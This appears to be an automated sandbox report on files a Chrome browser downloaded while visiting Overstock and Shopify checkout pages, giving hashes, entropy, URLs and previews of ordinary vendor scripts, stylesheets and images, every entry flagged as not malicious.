                                                                                                                                                                                    Preview:RIFFB...WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!.-....Y.4)@....lk.C..K..+}.U.K. .....m.D..*~O...Kx7.;.m...3.).s.......{.f..rO%...A5.!...3...S........#.`+....0....u...Z.o.....j.......T[JU....w..AJm.9.<k......;a.l.[...gNy%\......K.{....$.78.]E'.E3...d+....5~..<.[...' ....,S.TH..7u...0..jG.6....i..Ln3v.8.}u..?...3=.j......wi+.&R...0..L..E..L..........V.1..........~RI.......5......1|...<.....D..&.R..O.L6.i(N.Mgq....y".. (}....,.]V.c..WM:.}c)b.Co.-)@o~O......7.....TMp5.T.c..,.51K.[....O........9....~.[.T5..'if.._..$..>X.[{.T.....K.Y:.1'
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):328297
                                                                                                                                                                                    Entropy (8bit):5.578214460167059
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:q4dKGbgBu2odk2639cM8Gp/e29itu9BW24n1+:zd7cu2odmiAEo
                                                                                                                                                                                    MD5:8CCB52DB74E1E152A4625DAB7B6CE57F
                                                                                                                                                                                    SHA1:09E5A8A57369FEDDF087D4B50D736BB841970294
                                                                                                                                                                                    SHA-256:A0F7EC8C4857A4162EA89D2548BB198A973335FAF6D97031B8CFC6A1180B9609
                                                                                                                                                                                    SHA-512:D5110288C4D06A9CCA62DF25B7CE63630214E04446CB7D678AB84E2D6CB1659A67D29D8F5EA70EB3CE3983641D9CA3178D69BAA3B63467EF5B27703D2744886E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.googletagmanager.com/gtag/js?id=G-984DXKYD53
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                                    Entropy (8bit):4.741363816328152
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:HLszELACv:rlAs
                                                                                                                                                                                    MD5:FCE53AADCC76D6FE802E7998503F1622
                                                                                                                                                                                    SHA1:56FF4B7AD4B70A23D00AD38041ADA836619CC910
                                                                                                                                                                                    SHA-256:0821951C01640DB472308C1855DB1C5A7AAF08E8EC8C609E4FAB9D5D864F63E8
                                                                                                                                                                                    SHA-512:66220A964E574CBB3BD3A4A583E4CBDE65C65A935916D492B19E4A83DF94046E2816110A0961E35148B4EAFD305459673A3EAD7C8ED885798F7679C3DA695310
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/PickupPointCarrierLogo.C0wRU6wV.css
                                                                                                                                                                                    Preview:.veGnT{display:block;width:100%}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):21
                                                                                                                                                                                    Entropy (8bit):4.011365041826379
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:JSPKArOw:UK2
                                                                                                                                                                                    MD5:9F04282C5B3ECCA33E725626F894BFD5
                                                                                                                                                                                    SHA1:99CA782476CB7BFD553803F5BE308B090B096E3B
                                                                                                                                                                                    SHA-256:D366CB845818CB63FBA9D91C87D085CE44B2E6D7339B8CF30ADED4FA4EFA7EE9
                                                                                                                                                                                    SHA-512:5FED53394233BAE105AFFCEA2E34D2018168329DB8DCA4D152AA7429E0216E07B785B5AEC9A0298164DAA840D2558B64F8D402385159028759FFD4591652F606
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://unpkg.com/tapcart-capture-kit@0.3.0/dist/tc-plugins.es.js
                                                                                                                                                                                    Preview:import "./embed.js";.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (18850)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):18865
                                                                                                                                                                                    Entropy (8bit):5.187115085468122
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:gggIoLxpxNRGwUhJB95bFH8dUT+RCgsxZ26Cm168ePJLakOQKq3:8Lxb3hEJBPNsRseFP
                                                                                                                                                                                    MD5:9C5D1B58EE551D992D10FED3A5972EB9
                                                                                                                                                                                    SHA1:26596A5222F80A3E544B283B112D05479FE16ACA
                                                                                                                                                                                    SHA-256:2FAEE16B7095F268D3A3B7A7F912CB02D370C5E582C6AAC28DA24AAFEC87EC61
                                                                                                                                                                                    SHA-512:9A2A747C6810D71860EE3698B6061A7A35B6A1CD7BFADA5A2F263215FE2C8B64545AB086FB690B8C1713954E7B56F28A5C43D75ED87F3A2884BF4E781BE825DD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shopifycloud/perf-kit/shopify-perf-kit-1.0.1.min.js
                                                                                                                                                                                    Preview:!function(){"use strict";var e,t=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},n=function(e){if("loading"===document.readyState)return"loading";var n=t();if(n){if(e<n.domInteractive)return"loading";if(0===n.domContentLoadedEventStart||e<n.domContentLoadedEventStart)return"dom-interactive";if(0===n.domComplete||e<n.domComplete)return"dom-content-loaded"}return"complete"},r=function(e){var t=e.nodeName;return 1===e.nodeType?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},o=function(e,t){var n="";try{for(;e&&9!==e.nodeType;){var o=e,i=o.id?"#"+o.id:r(o)+(o.classList&&o.classList.value&&o.classList.value.trim()&&o.classList.value.trim().length?"."+o.classList.value.trim().replace(/\s+/g,"."):"");if(n.length+i.length>(t||100)-1)return n||i;if(n=n?i+">"+n:i,o.id)break;e=o.parentNode}}catch(e){}return n},i=-1,a=function(){return i},s=function(e){addEventListener("pageshow",(function(t){t.persisted&&(i=t.timeStamp,e(t))}),!
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1406)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1447
                                                                                                                                                                                    Entropy (8bit):5.165268358360242
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:HK6GOlMfVrwkgCpaxV4yQhYmxjC25jDsNu690C8X0xqsgKEaF7pAe/Tl5YdinF:q6BlMfICpaxCYmpC4jDspyXX0xq9Kr3L
                                                                                                                                                                                    MD5:F4AFE427D634492DF2A82253FAFE8276
                                                                                                                                                                                    SHA1:48C62414A8612DA6E489EE21197F52FF033DAABD
                                                                                                                                                                                    SHA-256:14465FFD61DDC9BC628D017E144397D529230C65ED58B825A94E67E4D06A886A
                                                                                                                                                                                    SHA-512:2D837A4FECB14F6B115CE81D7F08AC95843F95C1780F7C0318C05275AEBD4B00239694EAD32E58BBDDC113FD226711812E4E3948E7F3B09057942DD6035757F6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://storage.googleapis.com/workbox-cdn/releases/3.1.0/workbox-sw.js
                                                                                                                                                                                    Preview:var workbox=function(){"use strict";try{self.workbox.v["workbox:sw:3.1.0"]=1}catch(t){}const t="https://storage.googleapis.com/workbox-cdn/releases/3.1.0",e={backgroundSync:"background-sync",core:"core",expiration:"cache-expiration",googleAnalytics:"google-analytics",strategies:"strategies",precaching:"precaching",routing:"routing",cacheableResponse:"cacheable-response",broadcastUpdate:"broadcast-cache-update",rangeRequests:"range-requests"};return new class{constructor(){return this.v={},this.t={debug:"localhost"===self.location.hostname,modulePathPrefix:null,modulePathCb:null},this.e=this.t.debug?"dev":"prod",this.s=!1,new Proxy(this,{get(t,s){if(t[s])return t[s];const o=e[s];return o&&t.loadModule(`workbox-${o}`),t[s]}})}setConfig(t={}){if(this.s)throw new Error("Config must be set before accessing workbox.* modules");Object.assign(this.t,t),this.e=this.t.debug?"dev":"prod"}skipWaiting(){self.addEventListener("install",()=>self.skipWaiting())}clientsClaim(){self.addEventListener("ac
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):40265
                                                                                                                                                                                    Entropy (8bit):7.9651706566575715
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:9HqNF2d2HvpiCz48tFGgiOt2+zguqCE8iIJ+z3EYnCy7Sx:ZqdPp1tkgiOttzBqC3iIJMEYCRx
                                                                                                                                                                                    MD5:D1E6949B8E106A70170F07E8B2D32DFF
                                                                                                                                                                                    SHA1:88158D9E27719981A0AA17F935155A3236C86277
                                                                                                                                                                                    SHA-256:C83132169615526DC1753C9971404196685EC8F985632E82C1073EE6D13CD524
                                                                                                                                                                                    SHA-512:6C989E75E55D3D0B1DDB8983DB799D79764592AED783353511BAAC252AA5D0EADF9E106C7353BC1F27905D57156638E6B6DA293EEA63BFE15482428828C2BA00
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@..........................................................................................x.I.#....X-.W.E..d.B.].[..@0eu./.../}...V.....X....K.f[.+<u.-....[......&fLI...T*a....<B...M..g..j.+....^.$jV...v.e..V)...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (32944)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):83040
                                                                                                                                                                                    Entropy (8bit):5.470566629097824
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:IT/J8/f3Ke4pPE6TQoxfJUEI4wYC4Pl12dpAIjVWmmdUhd2bi:ITR8/f3l4m4tPL2fvWmmBO
                                                                                                                                                                                    MD5:8601A9EA53CF352C718A9F4D646085BC
                                                                                                                                                                                    SHA1:40466015DAE2BF248191BDBBACEF450162BAD633
                                                                                                                                                                                    SHA-256:F620ED1A82D4DF4BEA16168DEC3D569E0F62CDF25597E502314F10BE4BC1725D
                                                                                                                                                                                    SHA-512:C8C588C063F761F8AC0EA5168CDA67B52DE712AFE74E57D480C5774C5F72DAA2AA6FFF39A28A249B3BAC6AA594D446F9931A2D1CED93DBDF2511179E9B034A0C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/index.BImg1G4g.js
                                                                                                                                                                                    Preview:import{ei as _t,ej as Et,q as B,kW as Oe,T as X,y as z,A as Y,ae as st,a as x,ab as kt,h as et,bJ as Le,w as te,kX as Pe,kY as rn,dJ as sn,kZ as an,k_ as he,k$ as cn,l0 as ln,l1 as un,_ as I,l2 as dn,l3 as fn,l4 as me,l5 as Yt,ac as Dt}from"./app.DfgMZONA.js";const Ie=_t({autoOpened:!1,dispatch:()=>{throw new Error("Invalid attempt to call dispatch outside of AuthorizeStateProvider")},loaded:!1,modalDismissable:!1,modalVisible:!1,sessionDetected:!1}),se=()=>Et(Ie),Me=_t({client:void 0,leaveBreadcrumb:()=>{throw new Error("Invalid attempt to call leaveBreadcrumb outside of context.")},notify:()=>{throw new Error("Invalid attempt to call notify outside of context.")}}),St=()=>{const t=Et(Me);if(!t)throw new Error("Invalid attempt to use useBugsnag outside of BugsnagProvider.");return t},pn={analyticsData:{analyticsTraceId:""},getTrekkieAttributes:async()=>Promise.resolve({}),produceMonorailEvent:()=>{throw new Error("Invalid attempt to call produceMonorailEvent outside of context.")},tra
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (10966)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):11046
                                                                                                                                                                                    Entropy (8bit):5.287509630101107
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:TA3IDZk6jqIxqwTh9Sq4Tk8pjrJfx5UhwEhdw6hp2h4OMghTxMmJkHhw2hl2QX:3DZk6LxvTh1SFx5dCwagMkOmSSCv
                                                                                                                                                                                    MD5:0C0766FDA4B06ECB7B2F30A7A5DC2F08
                                                                                                                                                                                    SHA1:D6C671ED34BC32C70097D17142A18E8B5E95FAEC
                                                                                                                                                                                    SHA-256:C917657BEDCA3C54045064205546102E61943E32E3105D949E0BEC8C4C7DEA1B
                                                                                                                                                                                    SHA-512:849E281088D005E486AE98CAF12EA327CE374E89AAB89DB78A8C30DC5E50839D7B709A337734AB59D37A5B574D24ACFC783B46B7D9A3043B5C6312F100901809
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/tag-builds/10461/4.1/js/chunks/category-snippet.js
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.(self.pwrClg=self.pwrClg||[]).push([[280,284],{36760:(t,e,r)=>{"use strict";r.r(e),r.d(e,{default:()=>O});var n=r(48812),i=r.n(n),o=r(43688),a=r.n(o),p=r(84960),s=r.n(p),l=r(85668),c=r(85876),u=r(76840),d=r(92552),h=r(91672),g=r(90736),m=r(8980),v=r(86440),y=r(95668),f=r(82132),_=r(65056),w=r(60360),C=r(6880),S=r(77e3),N=["localizations","merchantProperties","features"],x=function(t){function e(){return t.apply(this,arguments)||this}s()(e,t);var r=e.prototype;return r.componentDidMount=function(){var t,e,r=this.props,n=r.isLoading,i=r.config,o=r.getSnippets,a=r.getReviews,p=r.rollup,s=r.displayApi;("boolean"!=typeof n&&(i.batched_page_ids?o(s,i):a(s,i)),null!=p)&&(null===(t=(e=this.props).onLoad)||void 0===t||t.call(e))},r.componentDidUpdate=function(t,e){var r,n;null==t.rollup&&null!=this.props.rollup&&(null===(r=(n=this.props).onLoad)||void 0===r||r.call(n))},r.render=function(){var t=this.props,e=t.confi
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (2182)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):53987
                                                                                                                                                                                    Entropy (8bit):5.09446484052787
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:4bwO1LkREvp9GqiCgtIB5XDaN6OmWm2Hv8WXWzWjWTWDWTWsWFWeoJDjYaZrm5Yg:NOmREvpIqiRtsoHcYaZrmyW
                                                                                                                                                                                    MD5:FBF77755508BA63B8C987567487923F9
                                                                                                                                                                                    SHA1:748BD9416954B8F5E0756D386E04BC371B1375ED
                                                                                                                                                                                    SHA-256:6E4C10ABDF66AF93891787E23E3BD8AAFAA30ECE3D72AF5A3178D62CFF803067
                                                                                                                                                                                    SHA-512:8AADDE42321E89EF704B9C5FB2E265D88FDD86EE9FEC019F498872818DB7222E3B69A1D0655602589D0440E8912410C775CCC9A565E72920E4D49C438707E1AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<section id="shopify-section-template--16930125217951__recommendations" class="shopify-section cc-product-recommendations"><link href="//www.overstock.com/cdn/shop/t/224/assets/product.css?v=81253555964418955201730157903" rel="stylesheet" type="text/css" media="all" />.<product-recommendations class="section" . data-search-url="/search?section_id=template--16930125217951__recommendations&limit=8" . data-limit="8". data-url="/recommendations/products?section_id=template--16930125217951__recommendations&product_id=&limit=8&intent=related" . data-product-id=""><div class="container">. <h2 class="h4 section__heading text-start">Similar items</h2>. </div><carousel-slider class="carousel block" inactive>. <div class="container relative">. <div class="slider" id="slider-template--16930125217951__recommendations"><div class="container products-grid-container">. <ul class="slider__grid grid grid-flow-col auto-cols-2 small-cards-mobile md:auto-cols-3 lg:auto-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4928), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4928
                                                                                                                                                                                    Entropy (8bit):5.836606992520049
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRU7WCgi6ry:1DY0hf1bT47OIqWb1WWY62
                                                                                                                                                                                    MD5:B079D6972F86C7ECFA1A4CB8D406A50B
                                                                                                                                                                                    SHA1:1394787E10DA2DD656E0BD556C999439C09E405B
                                                                                                                                                                                    SHA-256:ADA5378A3B08520B221C535554996308A1CFB6B37F6DC51F211DCC2DD63CE8F4
                                                                                                                                                                                    SHA-512:B653F7946A2842FB13B609DA734A8AFBD579179115AC19D1F6DEE57FEB820A34287C76E22906C447505463C0D6D9C245C827F2D0C9DD74706B2355FE9F51C8CC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3837)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3935
                                                                                                                                                                                    Entropy (8bit):5.0198580768693395
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:4zBl3bj+AFAYjt81ToGoDxV9mxBK2qoqud8:aAIjM69mxBK2kM8
                                                                                                                                                                                    MD5:66A2271E6BE66EFB076ECEE3CEAA7B3A
                                                                                                                                                                                    SHA1:5DD9990EBA6F7CB90381B6BE833270D6E0AF298F
                                                                                                                                                                                    SHA-256:354BB8913BA4B770BE4A45E921CBAF79DB62512BDB4E6F3AFBDB370BC97D39D4
                                                                                                                                                                                    SHA-512:70098EAFD810CC1A9C66C2FFFADD6F787F76FE5A3516378C9E2A94D6C7401518E7C52A50E7A27A2E959750FFF4C4FBFE100B9180B21657C2F4576BB4B4315D62
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/lightbox.css?v=161329142568396907661730157903
                                                                                                                                                                                    Preview:.entry-lightbox{bottom:0;left:0;outline:none;pointer-events:all;position:fixed;right:0;top:0;z-index:1030;opacity:1}.cl-dialog-form-submit{display:flex;-webkit-box-pack:center;justify-content:center;-webkit-box-align:center;align-items:center;background:#d90023;border:1px solid rgb(217,0,35);border-radius:2px;color:#fff;cursor:pointer;font-size:12px;max-height:34px;width:88px;margin-left:8px;min-width:88px}.cl-dialog-body-modal{border-radius:2px;bottom:auto;box-shadow:0 2px #54565833;left:50%;top:50%;align-items:flex-start;background:#fff;border:1px solid #dadcdf;box-sizing:border-box;display:flex;flex-direction:column;position:fixed;transform:translate3d(0,110%,0);transition:opacity .35s ease,transform .35s ease;width:100%;min-width:365px;max-width:375px;min-height:325px;max-height:335px;transform:translate3d(-50%,-50%,0) scale(1);opacity:1}.cl-dialog-close{background:none;border:none;cursor:pointer;display:inline-block;line-height:1;padding:8px;position:absolute;right:4px;top:3px}.cl
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (2440)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):5533
                                                                                                                                                                                    Entropy (8bit):4.4602873273275305
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:xF5XCq45hSJpS6BMSHq2Hq3m4pI96Cq0y9jTXdHjyJtCEO/H+Cuizv8aZX7kVPve:dXCqMhSJpS6BMSHq2Hq3m4pI96Cq0yJz
                                                                                                                                                                                    MD5:BC2E06193D924F9AC91286F1E868C62C
                                                                                                                                                                                    SHA1:9C7719E899853C2F9F1B5A4F3FFC0C003BAEA6EB
                                                                                                                                                                                    SHA-256:E57319061FCD43F33918B643407C439049E96EFB328492355E774DEBCE7A27AF
                                                                                                                                                                                    SHA-512:532FF25EC08CF3DDA2CB6D122FD07D815AC46B9318DA37B0991256FA9296F6ED8E482579AB041E7208480FA94BE1FF1394F54ED1678A832102C012908E360794
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:export const storeFrontRequest=async({query,variables={}})=>{const apiVersion=window?.DOMAINE?.technical?.apiVersion,shopName=window?.DOMAINE?.technical?.shopName,storefrontToken=window?.DOMAINE?.technical?.storefrontToken,queries={queryProductById:`. query getProductById($id: ID!, $imageCursor: String, $mediaCursor: String) {. product(id: $id) {. onlineStoreUrl. availableForSale. handle. title. images(first: 250, after: $imageCursor) {. pageInfo {. hasNextPage. endCursor. }. edges {. node {. alt: altText. height. id. src: url(transform: { preferredContentType: WEBP }). width. }. }. }. media(first: 250, after: $mediaCursor) {. pageInfo {. hasNextPage. endCursor. }. edges {.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2398
                                                                                                                                                                                    Entropy (8bit):7.094646938474127
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxHiSFRCWXCigqlu4JbqrsitaJuR6l:NBIl/XrxHVhyigJ4JbqRb6l
                                                                                                                                                                                    MD5:B70A734A1EDA59D8EBA8C8C25055E96F
                                                                                                                                                                                    SHA1:B7E2979659B57B6333FBAF6296B21D9E75D08595
                                                                                                                                                                                    SHA-256:4D7341BFF282A19D7322824EF011D7D29DF16B63F0D9C4AE9604D58EC8C4B2CF
                                                                                                                                                                                    SHA-512:8B2498F4ED52AB11E3222C7AE7589A64814A158097F1B723636048EFDACE7CAD5F6C1D0DC8057CA2C884E85BE0A1197D758BC2D06C7C871E01EA8B3A830B918A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.................................................................................gU 9-2V.(...L..a.1[.:N.CK......E.%z.1.o......J..(.y..f3..R..X..H.R.Tj|..I....c...t6y..r58.O...Pj..\...D.....[k_`z..`...b..d...`...R.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):78
                                                                                                                                                                                    Entropy (8bit):4.801445732171809
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:1JDRfFGyXN1dDGLOIC0IWeiEcRmugQMC:DDR9pXNiCQwugQR
                                                                                                                                                                                    MD5:A79547EED1E9652E4E91D8F00BB4E7D7
                                                                                                                                                                                    SHA1:6B716AF5662B392C077493146DB6416712332FF5
                                                                                                                                                                                    SHA-256:9F0AD38B29EAE39C7841139C3DD23C4402F69B55FA403D47AFBD1116447D392E
                                                                                                                                                                                    SHA-512:F86950C72DECF1A1FADBC0E641C119663136A18F4FD937EE551E1D45133A7BCE3FF68657074176D5D0CDF00B317745AB39E7B040B0F666BF3EA0407CDFCE9C71
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/SubscriptionPriceBreakdown.Bqs0s4oM.css
                                                                                                                                                                                    Preview:.hMn1U{line-height:calc(var(--x-global-typography-line-size-default) * 1.15)}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (34424), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):34424
                                                                                                                                                                                    Entropy (8bit):5.303388949056239
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:MRQFGgdLRvUdhxVhFzGPoQ5ZzxtaramUh8QF1N7aBGXoxK73OnBtNj9aDzSOGsY7:xZ1sZdmvBFjSBBWG3/E7frG3
                                                                                                                                                                                    MD5:CC519AE088319BBCDACAEC04285B3188
                                                                                                                                                                                    SHA1:93677FEF402AC29784512AB2D0690771E0A364D4
                                                                                                                                                                                    SHA-256:8CDAD1EBA19303C9AECB34392CCBA17F60FD672CCA22D1537C09BA543F95660D
                                                                                                                                                                                    SHA-512:33959F196AE7EAC1A1E24EC173673A0C33E439A65E5B4CE0DC06B7D258D6E797C869E06178CF1DA8C6839679239255C1DADD7FB7AC819FF259905D533372D2CE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
